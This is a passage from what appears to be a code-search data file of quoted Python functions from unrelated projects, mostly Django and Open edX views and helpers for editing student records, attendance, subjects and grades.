context_helper.guardian_type_helper(),\n\t\t\"gender_types\": context_helper.gender_helper(),\n\t\t'student_id': student_id\n\t}\n\tif request.method == 'POST':\n\t\tupdate_fields = []\n\t\tactivity = ''\n\t\tsname = request.POST.get('sname')\n\t\troll = request.POST.get('rno')\n\t\tdob = request.POST.get('dob')\n\t\tgender = request.POST.get('gender_picker')\n\t\tbgroup = request.POST.get('blood_group_picker')\n\t\tif bgroup == 'Choose option':\n\t\t\tbgroup = None\n\t\tphone = request.POST.get('phone')\n\t\tcurradd = request.POST.get('curradd')\n\t\tpermadd = request.POST.get('permadd')\n\t\tgname = request.POST.get('gname')\n\t\tcourse = request.POST.get('course_picker')\n\t\tbatch = request.POST.get('batch')\n\t\tgtype = request.POST.get('guardian_type_picker')\n\t\tgphone = request.POST.get('gphone')\n\t\temail = request.POST.get('email')\n\t\taddress_flag = request.POST.get('address_flag')\n\t\tprint (address_flag)\n\t\taddress_flag = True if address_flag == 'on' else False\n\t\tif address_flag == True:\n\t\t\tpermadd = curradd\n\t\ttry:\n\t\t\tif \"profile-img\" in request.FILES:\n\t\t\t\tstudent.photo = request.FILES[\"profile-img\"]\n\t\t\t\tupdate_fields.append('photo')\n\t\t\t\tactivity += 'Changed photo.\\n'\n\t\t\tif student.name != sname:\n\t\t\t\tstudent.name = sname\n\t\t\t\tupdate_fields.append('name')\n\t\t\t\tactivity += 'Changed name to '+ str(sname) +'.\\n'\n\t\t\tif student.roll_no != roll:\n\t\t\t\tstudent.roll_no = roll\n\t\t\t\tupdate_fields.append('roll_no')\n\t\t\t\tactivity += 'Changed roll number to '+ str(roll) +'.\\n'\n\t\t\tif str(student.dob) != str(dob):\n\t\t\t\tstudent.dob = dob\n\t\t\t\tupdate_fields.append('dob')\n\t\t\t\tactivity += 'Changed DOB to ' + str(dob) + '.\\n'\n\t\t\tif student.gender != gender:\n\t\t\t\tstudent.gender = gender\n\t\t\t\tupdate_fields.append('gender')\n\t\t\t\tactivity += 'Changed gender to ' + str(gender) + '.\\n'\n\t\t\tif student.blood_group != bgroup:\n\t\t\t\tstudent.blood_group = bgroup\n\t\t\t\tupdate_fields.append('blood_group')\n\t\t\t\tactivity += 'Changed blood group to ' + str(bgroup) + '.\\n'\n\t\t\tif student.phone != phone:\n\t\t\t\tstudent.phone = phone\n\t\t\t\tupdate_fields.append('phone')\n\t\t\t\tactivity += 'Changed phone number to ' + str(phone) + '.\\n'\n\t\t\tif student.curr_address != curradd:\n\t\t\t\tstudent.curr_address = curradd\n\t\t\t\tupdate_fields.append('curr_address')\n\t\t\t\tactivity += 'Changed current address to ' + str(curradd) + '.\\n'\n\t\t\tif student.perm_address != permadd:\n\t\t\t\tstudent.perm_address = permadd\n\t\t\t\tupdate_fields.append('perm_address')\n\t\t\t\tactivity += 'Changed permanent address to ' + str(permadd) + '.\\n'\n\t\t\tif student.curr_address != curradd:\n\t\t\t\tstudent.curr_address = curradd\n\t\t\t\tupdate_fields.append('curr_address')\n\t\t\t\tactivity += 'Changed current address to ' + str(curradd) + '.\\n'\n\t\t\tif student.guardian_name != gname:\n\t\t\t\tstudent.guardian_name = gname\n\t\t\t\tupdate_fields.append('guardian_name')\n\t\t\t\tactivity += 'Changed current address to ' + str(gname) + '.\\n'\n\t\t\tif student.guardian_phone != gphone:\n\t\t\t\tstudent.guardian_phone = gphone\n\t\t\t\tupdate_fields.append('guardian_phone')\n\t\t\t\tactivity += 'Changed guardian phone to ' + str(gphone) + '.\\n'\n\t\t\tif student.guardian_type != gtype:\n\t\t\t\tstudent.guardian_type = gtype\n\t\t\t\tupdate_fields.append('guardian_type')\n\t\t\t\tactivity += 'Changed current address to ' + str(gtype) + '.\\n'\n\t\t\tif str(student.course.pk) != str(course):\n\t\t\t\tstudent.course = models.Course.objects.get(pk=course)\n\t\t\t\tupdate_fields.append('course')\n\t\t\t\tactivity += 'Changed course to ' + str(course) + '.\\n'\n\t\t\tif student.batch != batch:\n\t\t\t\tstudent.batch = batch\n\t\t\t\tupdate_fields.append('batch')\n\t\t\t\tactivity += 'Changed batch to' + str(batch) + '.\\n'\n\t\t\tif student.email != email:\n\t\t\t\tstudent.email = email\n\t\t\t\tupdate_fields.append('email')\n\t\t\t\tactivity += 'Changed email to ' + str(email) + '.\\n'\n\t\t\tif student.address_flag != address_flag:\n\t\t\t\tstudent.address_flag = address_flag\n\t\t\t\tupdate_fields.append('address_flag')\n\t\t\t\tactivity += 'Changed address flag.'\n\t\t\tstudent.save(update_fields=update_fields)\n\t\t\thistory = models.History(\n\t\t\t\tuser=emp,\n\t\t\t\tactivity=activity,\n\t\t\t\tactivity_type=\"edit student\"\n\t\t\t)\n\t\t\thistory.save()\n\t\t\tcontext_dict[\"message\"] = 'Successfully updated student.'\n\t\t\tcontext_dict[\"success\"] = True\n\t\texcept Exception as e:\n\t\t\tcontext_dict[\"message\"] = str(e)\n\t\t\tcontext_dict[\"success\"] = False\n\t\t\tprint(e)\n\tcontext_dict.update(context_helper.get_student_info(student))\n\tif type(context_dict['dob']) == str:\n\t\tcontext_dict['dob'] = datetime.strptime(context_dict['dob'], '%Y-%m-%d')\n\tfor i in context_dict['course']:\n\t\ttry: del context_dict['all_courses'][i]\n\t\texcept: pass\n\tfor i in context_dict['blood_group']:\n\t\ttry: context_dict['blood_groups'].remove(i)\n\t\texcept: pass\n\tfor i in context_dict['guardian_type']:\n\t\ttry: context_dict['guardian_types'].remove(i)\n\t\texcept: pass\n\tfor i in context_dict['gender_type']:\n\t\ttry: context_dict['gender_types'].remove(i)\n\t\texcept: pass\n\tif context_dict.get('success', False):\n\t\treturn HttpResponseRedirect('/view-students')\n\treturn render(\n\t\trequest, \"editStudent.html\", context_dict\n\t)", "def __ui_grade_student(self):\n student_id = input(\"Give student ID: \")\n discipline_name = input(\"Give discipline discipline_name: \")\n\n try:\n grade_value = input(\"Give grade: \")\n if not self.__student_controller.student_has_discipline(student_id, discipline_name):\n print(\"The student isn't enrolled at the given discipline!\")\n return\n self.__grade_controller.add_grade(\n student_id,\n self.__discipline_controller.get_id_by_name(discipline_name),\n grade_value\n )\n print(\"Grade successful! \\n\")\n\n except GradeException as ge:\n print(ge)\n return\n except StudentException as se:\n print(se)\n return\n except RepositoryException as re:\n print(re)\n return\n except ValueError as ve:\n print(ve)\n return", "def add_grades(self, request, pk=None):\n\n instance = self.get_object()\n try:\n user = self.request.user\n query = models.StudentSubject.objects.filter(\n subject__teacher__user=user,\n subject=instance\n )\n serializer = self.get_serializer(query, many=True)\n \n id = self.request.query_params.get('id')\n\n if id:\n q = get_object_or_404(\n models.StudentSubject,\n pk=id,\n subject=instance\n )\n return self.filtering(request, q)\n return Response(serializer.data)\n except:\n raise except_handler.ActionDecor()", "def modify_an_entry(self):\n target_list = self.find_student()\n\n if not len(target_list):\n print('There is no contents to show')\n else:\n opt = self.input_options(['midterm', 'finalterm'], 1, 'Which test do you want to modify?')\n score = self.input_score()\n\n if opt.upper() == 'MIDTERM':\n for idx in target_list.index:\n self.student_list.loc[self.student_list.index == idx, 'midterm'] = score\n else:\n for idx in target_list.index:\n self.student_list.loc[self.student_list.index == idx, 'finalterm'] = score", "def insert_question_assignmentype(request, pk, cd):\n prof = request.user.prof\n assignmentype = Assignmentype.objects.filter(id=pk, prof=prof).first()\n cd = int(cd)\n if cd == 1:\n classForm = AddQuestionForm\n info = 'Add'\n elif cd == -1:\n classForm = RemoveQuestionForm\n info = 'Remove'\n if assignmentype:\n if request.method == 'POST':\n form = classForm(request.POST,\n nb_questions=assignmentype.nb_questions)\n if form.is_valid():\n question = form.cleaned_data['question']\n # Modify attribute question of all associated evalquestion\n if cd == -1:\n evalquestions = Evalquestion.objects.filter(\n evalassignment__assignment__assignmentype=assignmentype,\n question=question)\n evalquestions.delete()\n evalquestions = Evalquestion.objects.filter(\n evalassignment__assignment__assignmentype=assignmentype,\n question__gte=question)\n evalquestions.update(question=F('question') + cd)\n # Create a new evalquestion for each evalassignment (if cd=1)\n # and inform that it has to be graded\n for evalassignment in Evalassignment.objects.filter(\n assignment__assignmentype=assignmentype):\n if cd == 1:\n Evalquestion.objects.create(\n evalassignment=evalassignment, question=question)\n evalassignment.reset_grade()\n elif cd == -1:\n evalassignment.grade_assignment = None\n evalassignment.save()\n # Add a question to the assignmentype\n assignmentype.nb_questions += cd\n if cd == 1:\n if assignmentype.questions_coeff:\n assignmentype.questions_coeff.insert(question - 1, None)\n if assignmentype.questions_statement:\n assignmentype.questions_statement.insert(question - 1,\n None)\n assignmentype.save()\n elif cd == -1:\n if assignmentype.questions_coeff:\n del assignmentype.questions_coeff[question - 1]\n if assignmentype.questions_statement:\n del assignmentype.questions_statement[question - 1]\n assignmentype.save()\n log = tasks.compute_grades_assignmentype(assignmentype.pk)\n logger.info(log)\n return redirect('/detail_assignmentype/%s/' % assignmentype.pk)\n form = classForm(nb_questions=assignmentype.nb_questions)\n context = {'assignmentype': assignmentype, 'form': form, 'info': info,\n 'cd': cd}\n return render(request, 'gradapp/insert_question.html', context)\n else:\n return redirect('gradapp:index')", "def edit(self, **kwargs):\n ...", "def save_grade(request, course_id):\r\n\r\n course_key = SlashSeparatedCourseKey.from_deprecated_string(course_id)\r\n _check_access(request.user, course_key)\r\n\r\n if request.method != 'POST':\r\n raise Http404\r\n p = request.POST\r\n required = set(['score', 'feedback', 'submission_id', 'location', 'submission_flagged'])\r\n skipped = 'skipped' in p\r\n #If the instructor has skipped grading the submission, then there will not be any rubric scores.\r\n #Only add in the rubric scores if the instructor has not skipped.\r\n if not skipped:\r\n required.add('rubric_scores[]')\r\n actual = set(p.keys())\r\n missing = required - actual\r\n if len(missing) > 0:\r\n return _err_response('Missing required keys {0}'.format(\r\n ', '.join(missing)))\r\n\r\n success, message = check_feedback_length(p)\r\n if not success:\r\n return _err_response(message)\r\n\r\n grader_id = unique_id_for_user(request.user)\r\n\r\n location = course_key.make_usage_key_from_deprecated_string(p['location'])\r\n\r\n try:\r\n result = staff_grading_service().save_grade(course_key,\r\n grader_id,\r\n p['submission_id'],\r\n p['score'],\r\n p['feedback'],\r\n skipped,\r\n p.getlist('rubric_scores[]'),\r\n p['submission_flagged'])\r\n except GradingServiceError:\r\n #This is a dev_facing_error\r\n log.exception(\r\n \"Error saving grade in the staff grading interface in open ended grading. Request: {0} Course ID: {1}\".format(\r\n request, course_id))\r\n #This is a staff_facing_error\r\n return _err_response(STAFF_ERROR_MESSAGE)\r\n except ValueError:\r\n #This is a dev_facing_error\r\n log.exception(\r\n \"save_grade returned broken json in the staff grading interface in open ended grading: {0}\".format(\r\n result_json))\r\n #This is a staff_facing_error\r\n return _err_response(STAFF_ERROR_MESSAGE)\r\n\r\n if not result.get('success', False):\r\n #This is a dev_facing_error\r\n log.warning(\r\n 'Got success=False from staff grading service in open ended grading. Response: {0}'.format(result_json))\r\n return _err_response(STAFF_ERROR_MESSAGE)\r\n\r\n # Ok, save_grade seemed to work. Get the next submission to grade.\r\n return HttpResponse(json.dumps(_get_next(course_id, grader_id, location)),\r\n mimetype=\"application/json\")", "def edit_subject(request,subject_id):\n\n\temp = models.Teacher.objects.get(user=request.user)\n\tif not emp.subject_permit:\n\t\traise Http404\n\tsubject = models.Subject.objects.filter(\n\t\tpk=subject_id, soft_delete=False\n\t).first()\n\tif not subject:\n\t\traise Http404\n\tcontext_dict = {\n\t\t\"all_courses\": context_helper.course_helper(),\n\t\t\"subject_types\": context_helper.subject_type_helper(),\n\t\t'subject_id': subject_id,\n\t}\n\tif request.method == 'POST':\n\t\tupdate_fields = []\n\t\tactivity = ''\n\t\tcourse = request.POST.get('course_picker')\n\t\tname = request.POST.get('sname')\n\t\tsid = request.POST.get('sid')\n\t\tstype = request.POST.get('subject_picker')\n\t\tmaxmarks = request.POST.get('marks')\n\t\ttry:\n\t\t\tif str(subject.course.pk) != str(course):\n\t\t\t\tsubject.course = models.Course.objects.get(pk=course)\n\t\t\t\tupdate_fields.append('course')\n\t\t\t\tactivity += 'Changed course to ' + str(course) + '.\\n'\n\t\t\tif subject.s_type != stype:\n\t\t\t\tsubject.s_type = stype\n\t\t\t\tupdate_fields.append('s_type')\n\t\t\t\tactivity += 'Changed subject type to ' + str(stype) + '.\\n'\n\t\t\tif subject.name != name:\n\t\t\t\tsubject.name = name\n\t\t\t\tupdate_fields.append('name')\n\t\t\t\tactivity += 'Changed subject name to' + str(name) + '.\\n'\n\t\t\tif subject.s_id != sid:\n\t\t\t\tsubject.s_id = sid\n\t\t\t\tupdate_fields.append('s_id')\n\t\t\t\tactivity += 'Changed subject ID to' + str(sid) + '.\\n'\n\t\t\tif subject.max_marks != maxmarks:\n\t\t\t\tsubject.max_marks = maxmarks\n\t\t\t\tupdate_fields.append('max_marks')\n\t\t\t\tactivity += 'Changed maximum marks to' + str(maxmarks) + '.\\n'\n\t\t\tsubject.save(update_fields=update_fields)\n\t\t\thistory = models.History(\n\t\t\t\tuser=emp,\n\t\t\t\tactivity=activity,\n\t\t\t\tactivity_type=\"edit subject\"\n\t\t\t)\n\t\t\thistory.save()\n\t\t\tcontext_dict[\"message\"] = 'Successfully updated Result Data.'\n\t\t\tcontext_dict[\"success\"] = True\n\t\texcept Exception as e:\n\t\t\tcontext_dict[\"message\"] = str(e)\n\t\t\tcontext_dict[\"success\"] = False\n\t\t\tprint(e)\n\tcontext_dict.update(context_helper.get_subject_info(subject))\n\tfor i in context_dict['courses']:\n\t\ttry: del context_dict['all_courses'][i]\n\t\texcept: pass\n\tfor i in context_dict['subject_type']:\n\t\ttry: context_dict['subject_types'].remove(i)\n\t\texcept: pass\n\tif context_dict.get('success', False):\n\t\treturn HttpResponseRedirect('/view-subjects')\n\treturn render(\n\t\trequest, \"editSubject.html\", context_dict\n\t)", "def edit_person(self, pk):", "def _grade(student, request, course, keep_raw_scores):\r\n grading_context = course.grading_context\r\n raw_scores = []\r\n\r\n # Dict of item_ids -> (earned, possible) point tuples. This *only* grabs\r\n # scores that were registered with the submissions API, which for the moment\r\n # means only openassessment (edx-ora2)\r\n submissions_scores = sub_api.get_scores(\r\n course.id.to_deprecated_string(), anonymous_id_for_user(student, course.id)\r\n )\r\n\r\n totaled_scores = {}\r\n # This next complicated loop is just to collect the totaled_scores, which is\r\n # passed to the grader\r\n for section_format, sections in grading_context['graded_sections'].iteritems():\r\n format_scores = []\r\n for section in sections:\r\n section_descriptor = section['section_descriptor']\r\n section_name = section_descriptor.display_name_with_default\r\n\r\n # some problems have state that is updated independently of interaction\r\n # with the LMS, so they need to always be scored. (E.g. foldit.,\r\n # combinedopenended)\r\n should_grade_section = any(\r\n descriptor.always_recalculate_grades for descriptor in section['xmoduledescriptors']\r\n )\r\n\r\n # If there are no problems that always have to be regraded, check to\r\n # see if any of our locations are in the scores from the submissions\r\n # API. If scores exist, we have to calculate grades for this section.\r\n if not should_grade_section:\r\n should_grade_section = any(\r\n descriptor.location.to_deprecated_string() in submissions_scores\r\n for descriptor in section['xmoduledescriptors']\r\n )\r\n\r\n if not should_grade_section:\r\n with manual_transaction():\r\n should_grade_section = StudentModule.objects.filter(\r\n student=student,\r\n module_state_key__in=[\r\n descriptor.location for descriptor in section['xmoduledescriptors']\r\n ]\r\n ).exists()\r\n\r\n # If we haven't seen a single problem in the section, we don't have\r\n # to grade it at all! We can assume 0%\r\n if should_grade_section:\r\n scores = []\r\n\r\n def create_module(descriptor):\r\n '''creates an XModule instance given a descriptor'''\r\n # TODO: We need the request to pass into here. If we could forego that, our arguments\r\n # would be simpler\r\n with manual_transaction():\r\n field_data_cache = FieldDataCache([descriptor], course.id, student)\r\n return get_module_for_descriptor(student, request, descriptor, field_data_cache, course.id)\r\n\r\n for module_descriptor in yield_dynamic_descriptor_descendents(section_descriptor, create_module):\r\n\r\n (correct, total) = get_score(\r\n course.id, student, module_descriptor, create_module, scores_cache=submissions_scores\r\n )\r\n if correct is None and total is None:\r\n continue\r\n\r\n if settings.GENERATE_PROFILE_SCORES: \t# for debugging!\r\n if total > 1:\r\n correct = random.randrange(max(total - 2, 1), total + 1)\r\n else:\r\n correct = total\r\n\r\n graded = module_descriptor.graded\r\n if not total > 0:\r\n #We simply cannot grade a problem that is 12/0, because we might need it as a percentage\r\n graded = False\r\n\r\n scores.append(Score(correct, total, graded, module_descriptor.display_name_with_default))\r\n\r\n _, graded_total = graders.aggregate_scores(scores, section_name)\r\n if keep_raw_scores:\r\n raw_scores += scores\r\n else:\r\n graded_total = Score(0.0, 1.0, True, section_name)\r\n\r\n #Add the graded total to totaled_scores\r\n if graded_total.possible > 0:\r\n format_scores.append(graded_total)\r\n else:\r\n log.exception(\"Unable to grade a section with a total possible score of zero. \" +\r\n str(section_descriptor.location))\r\n\r\n totaled_scores[section_format] = format_scores\r\n\r\n grade_summary = course.grader.grade(totaled_scores, generate_random_scores=settings.GENERATE_PROFILE_SCORES)\r\n\r\n # We round the grade here, to make sure that the grade is an whole percentage and\r\n # doesn't get displayed differently than it gets grades\r\n grade_summary['percent'] = round(grade_summary['percent'] * 100 + 0.05) / 100\r\n\r\n letter_grade = grade_for_percentage(course.grade_cutoffs, grade_summary['percent'])\r\n grade_summary['grade'] = letter_grade\r\n grade_summary['totaled_scores'] = totaled_scores \t# make this available, eg for instructor download & debugging\r\n if keep_raw_scores:\r\n grade_summary['raw_scores'] = raw_scores # way to get all RAW scores out to instructor\r\n # so grader can be double-checked\r\n return grade_summary", "def editDetail(id):\n form = EditDetailForm(request.form)\n if request.method == \"GET\":\n return render_template(\"/pages/edit.html\", form=form)\n else:\n choose = True\n section = form.category.data\n return redirect(url_for(\"editDetailSection\", id=id ,section=section))", "def edit_attendance(request, attendance_id):\n\n\temp = models.Teacher.objects.get(user=request.user)\n\tif not emp.student_permit:\n\t\traise Http404\n\tattendance = models.Attendance.objects.filter(\n\t\tpk=attendance_id, soft_delete=False\n\t).first()\n\tprint(\"1\")\n\tcontext_dict = {\n\t\t\"all_subjects\": context_helper.subject_helper(),\n\t\t'attendance_id': attendance_id,\n\t}\n\tif request.method == 'POST':\n\t\tupdate_fields = []\n\t\tactivity = ''\n\t\troll = request.POST.get('roll')\n\t\tsubject = request.POST.get('subject_picker')\n\t\tobtained = request.POST.get('attendance')\n\t\ttotal = request.POST.get('total')\n\t\tstudent = models.Student.objects.filter(\n\t\t\troll_no=roll\n\t\t).first()\n\t\tif not student:\n\t\t\tcontext_dict[\"message\"] = 'Student at does not exist / Roll number has not been alloted.'\n\t\t\treturn render(request, \"editAttendance.html\", context_dict)\n\t\ttry:\n\t\t\tif attendance.student != student:\n\t\t\t\tattendance.student = student\n\t\t\t\tupdate_fields.append('student')\n\t\t\t\tactivity += 'Changed student to ' + str(student) + '.\\n'\n\t\t\tif attendance.total_attendance != total:\n\t\t\t\tattendance.total_attendance = total\n\t\t\t\tupdate_fields.append('total_attendance')\n\t\t\t\tactivity += 'Changed total attendance to ' + str(total) + '.\\n'\n\t\t\tif attendance.obtained_attendance != obtained:\n\t\t\t\tattendance.obtained_attendance = obtained\n\t\t\t\tupdate_fields.append('obtained_attendance')\n\t\t\t\tactivity += 'Changed obtained attendance to' + str(obtained) + '.\\n'\n\t\t\tif str(attendance.subject.pk) != str(subject):\n\t\t\t\tattendance.subject = models.Subject.objects.get(pk=subject)\n\t\t\t\tupdate_fields.append('subject')\n\t\t\t\tactivity += 'Changed subject to ' + str(subject) + '.\\n'\n\t\t\tattendance.save(update_fields=update_fields)\n\t\t\thistory = models.History(\n\t\t\t\tuser=emp,\n\t\t\t\tactivity=activity,\n\t\t\t\tactivity_type=\"edit attendance\"\n\t\t\t)\n\t\t\thistory.save()\n\t\t\tcontext_dict[\"message\"] = 'Successfully updated Attendance.'\n\t\t\tcontext_dict[\"success\"] = True\n\t\texcept Exception as e:\n\t\t\tcontext_dict[\"message\"] = str(e)\n\t\t\tcontext_dict[\"success\"] = False\n\t\t\tprint(e)\n\tcontext_dict.update(context_helper.get_attendance_info(attendance))\n\tfor i in context_dict['subjects']:\n\t\t# use for dynamic\n\t\ttry: del context_dict['all_subjects'][i]\n\t\texcept: pass\n\tif context_dict.get('success', False):\n\t\treturn HttpResponseRedirect('/view-attendance')\n\treturn render(\n\t\trequest, \"editAttendance.html\", context_dict\n\t)", "def put(self, id=None):\n\n if not id:\n return {'msg':'Missing achievement id.'}, 400\n\n if not all(\n [request.form.get('roll_no'),\n request.form.get('name'),\n request.form.get('batch'),\n request.form.get('programme'),\n request.form.get('category'),]):\n \n return {'msg':'Field(s) missing.'}, 400\n\n try:\n ach = AcademicAchievement.query.get(id)\n\n if not ach:\n return {'msg':'Academic achievement not found'}, 404\n\n ach.roll_no = request.form.get('roll_no'),\n ach.name = request.form.get('name'),\n ach.batch = checkBatch(request.form.get('batch')),\n ach.programme = request.form.get('programme'),\n ach.category = request.form.get('category'),\n\n ach.save()\n data = ach.toDict()\n\n return {'data' : data}, 200\n\n except (ValueError, mongoalchemy.exceptions.BadValueException) as e:\n print(e)\n return {'msg':'Invalid form data.'}, 400\n\n except Exception as e:\n print(e)\n return {'msg':'Could not modify academic achievement.'}, 500", "def updateStudentProposalReferences(request):\n\n return updateReferencesForModel('student_proposal')", "def AddGrade(self, student, discipline, grade_value):\n if not self.__data['s'].HasKey(student.ID):\n raise NonExistentItemIDError(\"Student does not exist.\")\n if not self.__data['d'].HasKey(discipline.ID):\n raise NonExistentItemIDError(\"Discipline does not exist.\")\n self.__data['g'].AddItems([Grade(self.__data['g'].GetSafeKey(), student.ID, discipline.ID, grade_value)])\n self.__undo_list.append(['g'])\n self.__redo_list.clear()", "def update_attempt_with_grading(db, attempt_id, grading):\n attrs = {}\n if grading['is_solution']:\n attrs['is_unsolved'] = False\n if grading['is_full_solution']:\n attrs['is_fully_solved'] = True\n if len(attrs) > 0:\n db.update_row(db.tables.attempts, attempt_id, attrs)", "def editConcept(self):\n if self.concept_list.currentIndex().isValid():\n concept = self.concept_list.selectedItems()[0].data(Qt.UserRole)[0]\n subcategory = self.concept_list.selectedItems()[0].data(Qt.UserRole)[1]\n dlg = EditConceptDialog(self, concept, subcategory)\n if dlg.exec_():\n concept, subcategory = dlg.getValue()\n self.db.update_concept(concept)\n self.db.update_subcategory(subcategory)\n self.search()", "def save(self, *args, **kwargs):\n super(CurriculumGuideSection, self).save(*args, **kwargs)\n self.clean()", "def update_employee(employee):\n employee_id = get_employee_input_int(\"Enter the employee id you want to update\")\n newGrade = get_employee_input_int(\"Enter the new grade for \")\n db.update_employee(employee_id, newGrade)\n print(employee.full_name + \"'s grade value has been updated to :-> \", newGrade)", "def change_view(self, request, object_id, form_url='', extra_context=None):\n section = models.Section.objects.filter(pk=object_id)\\\n .prefetch_related(\"facility__experiment\",\n \"participants\")\\\n .first()\n exp_id = section.facility.experiment.id\n # create bulk forms\n bulk_add_change_frm = create_bulk_add_change_form(request, exp_id)\n bulk_del_frm = create_bulk_delete_form(request)\n # attach site id and bulk forms to 'extra_context'\n extra_context = extra_context or {}\n extra_context['section_id'] = object_id\n extra_context[\"bulk_add_change_form\"] = bulk_add_change_frm\n extra_context['bulk_delete_form'] = bulk_del_frm\n # print extra_context\n return super(SectionAdmin, self).change_view(\n request, object_id, form_url, extra_context=extra_context)", "def updateStudents(request):\n\n return updateRole('gsoc_student')", "def set_grade(\n self,\n assignment_id,\n student_id,\n grade_value,\n gradebook_id='',\n **kwargs\n ):\n # pylint: disable=too-many-arguments\n\n # numericGradeValue stringified because 'x' is a possible\n # value for excused grades.\n grade_info = {\n 'studentId': student_id,\n 'assignmentId': assignment_id,\n 'mode': 2,\n 'comment': 'from MITx {0}'.format(time.ctime(time.time())),\n 'numericGradeValue': str(grade_value),\n 'isGradeApproved': False\n }\n grade_info.update(kwargs)\n log.info(\n \"student %s set_grade=%s for assignment %s\",\n student_id,\n grade_value,\n assignment_id)\n return self.post(\n 'grades/{gradebookId}'.format(\n gradebookId=gradebook_id or self.gradebook_id\n ),\n data=grade_info,\n )", "def update(self, request, pk=None):\n current_user = User.objects.get(id=request.user.id)\n if current_user.is_staff:\n try:\n category = Category.objects.get(pk=pk)\n except Category.DoesNotExist:\n return Response({\"reason\": \"Doesn't Exist\"}, status=status.HTTP_400_BAD_REQUEST)\n category.label = request.data['label']\n category.approved = False\n try:\n category.save()\n return Response({}, status=status.HTTP_204_NO_CONTENT)\n except ValidationError as ex:\n return Response({\"reason\": ex.message}, status=status.HTTP_400_BAD_REQUEST)\n else:\n return Response({'message': \"*Sigh*, you're not changing a thing, non-admin\"},\n status=status.HTTP_403_FORBIDDEN)", "def edit_classifications(self, identifier_type, identifier):\n self.require_librarian(flask.request.library)\n\n work = self.load_work(flask.request.library,\n identifier_type, identifier)\n if isinstance(work, ProblemDetail):\n return work\n\n staff_data_source = DataSource.lookup(\n self._db, DataSource.LIBRARY_STAFF)\n\n # Previous staff classifications\n primary_identifier = work.presentation_edition.primary_identifier\n old_classifications = self._db \\\n .query(Classification) \\\n .join(Subject) \\\n .filter(\n Classification.identifier == primary_identifier,\n Classification.data_source == staff_data_source\n )\n old_genre_classifications = old_classifications \\\n .filter(Subject.genre_id != None)\n old_staff_genres = [\n c.subject.genre.name\n for c in old_genre_classifications\n if c.subject.genre\n ]\n old_computed_genres = [\n work_genre.genre.name\n for work_genre in work.work_genres\n ]\n\n # New genres should be compared to previously computed genres\n new_genres = flask.request.form.getlist(\"genres\")\n genres_changed = sorted(new_genres) != sorted(old_computed_genres)\n\n # Update audience\n new_audience = flask.request.form.get(\"audience\")\n if new_audience != work.audience:\n # Delete all previous staff audience classifications\n for c in old_classifications:\n if c.subject.type == Subject.FREEFORM_AUDIENCE:\n self._db.delete(c)\n\n # Create a new classification with a high weight\n primary_identifier.classify(\n data_source=staff_data_source,\n subject_type=Subject.FREEFORM_AUDIENCE,\n subject_identifier=new_audience,\n weight=WorkController.STAFF_WEIGHT,\n )\n\n # Update target age if present\n new_target_age_min = flask.request.form.get(\"target_age_min\")\n new_target_age_min = int(\n new_target_age_min) if new_target_age_min else None\n new_target_age_max = flask.request.form.get(\"target_age_max\")\n new_target_age_max = int(\n new_target_age_max) if new_target_age_max else None\n if new_target_age_max is not None and new_target_age_min is not None and \\\n new_target_age_max < new_target_age_min:\n return INVALID_EDIT.detailed(_(\"Minimum target age must be less than maximum target age.\"))\n\n if work.target_age:\n old_target_age_min = work.target_age.lower\n old_target_age_max = work.target_age.upper\n else:\n old_target_age_min = None\n old_target_age_max = None\n if new_target_age_min != old_target_age_min or new_target_age_max != old_target_age_max:\n # Delete all previous staff target age classifications\n for c in old_classifications:\n if c.subject.type == Subject.AGE_RANGE:\n self._db.delete(c)\n\n # Create a new classification with a high weight - higher than audience\n if new_target_age_min and new_target_age_max:\n age_range_identifier = \"%s-%s\" % (\n new_target_age_min, new_target_age_max)\n primary_identifier.classify(\n data_source=staff_data_source,\n subject_type=Subject.AGE_RANGE,\n subject_identifier=age_range_identifier,\n weight=WorkController.STAFF_WEIGHT * 100,\n )\n\n # Update fiction status\n # If fiction status hasn't changed but genres have changed,\n # we still want to ensure that there's a staff classification\n new_fiction = True if flask.request.form.get(\n \"fiction\") == \"fiction\" else False\n if new_fiction != work.fiction or genres_changed:\n # Delete previous staff fiction classifications\n for c in old_classifications:\n if c.subject.type == Subject.SIMPLIFIED_FICTION_STATUS:\n self._db.delete(c)\n\n # Create a new classification with a high weight (higher than genre)\n fiction_term = \"Fiction\" if new_fiction else \"Nonfiction\"\n classification = primary_identifier.classify(\n data_source=staff_data_source,\n subject_type=Subject.SIMPLIFIED_FICTION_STATUS,\n subject_identifier=fiction_term,\n weight=WorkController.STAFF_WEIGHT,\n )\n classification.subject.fiction = new_fiction\n\n # Update genres\n # make sure all new genres are legit\n for name in new_genres:\n genre, is_new = Genre.lookup(self._db, name)\n if not isinstance(genre, Genre):\n return GENRE_NOT_FOUND\n if genres[name].is_fiction is not None and genres[name].is_fiction != new_fiction:\n return INCOMPATIBLE_GENRE\n if name == \"Erotica\" and new_audience != \"Adults Only\":\n return EROTICA_FOR_ADULTS_ONLY\n\n if genres_changed:\n # delete existing staff classifications for genres that aren't being kept\n for c in old_genre_classifications:\n if c.subject.genre.name not in new_genres:\n self._db.delete(c)\n\n # add new staff classifications for new genres\n for genre in new_genres:\n if genre not in old_staff_genres:\n classification = primary_identifier.classify(\n data_source=staff_data_source,\n subject_type=Subject.SIMPLIFIED_GENRE,\n subject_identifier=genre,\n weight=WorkController.STAFF_WEIGHT\n )\n\n # add NONE genre classification if we aren't keeping any genres\n if len(new_genres) == 0:\n primary_identifier.classify(\n data_source=staff_data_source,\n subject_type=Subject.SIMPLIFIED_GENRE,\n subject_identifier=SimplifiedGenreClassifier.NONE,\n weight=WorkController.STAFF_WEIGHT\n )\n else:\n # otherwise delete existing NONE genre classification\n none_classifications = self._db \\\n .query(Classification) \\\n .join(Subject) \\\n .filter(\n Classification.identifier == primary_identifier,\n Subject.identifier == SimplifiedGenreClassifier.NONE\n ) \\\n .all()\n for c in none_classifications:\n self._db.delete(c)\n\n # Update presentation\n policy = PresentationCalculationPolicy(\n classify=True,\n regenerate_opds_entries=True,\n regenerate_marc_record=True,\n update_search_index=True\n )\n work.calculate_presentation(policy=policy)\n\n return Response(\"\", 200)", "def test_superuser_edit_assessment(self):\n req, resp = data.get_assessment(self.contract['id'])\n\n response = self.superuser.put(self.assessment_report_url, req)\n self.assertEqual(response.status_code, status.HTTP_200_OK)\n\n response = self.superuser.patch(self.assessment_report_url, req)\n self.assertEqual(response.status_code, status.HTTP_200_OK)", "def test_update_category(self):\n self.update_success(self.test_data['pants'], self.test_data['shirts'])", "def detail_assignmentype(request, pk):\n prof = request.user.prof\n context = {'prof': prof}\n assignmentype = Assignmentype.objects.filter(pk=pk, prof=prof).first()\n assignments = assignmentype.assignment_set.\\\n 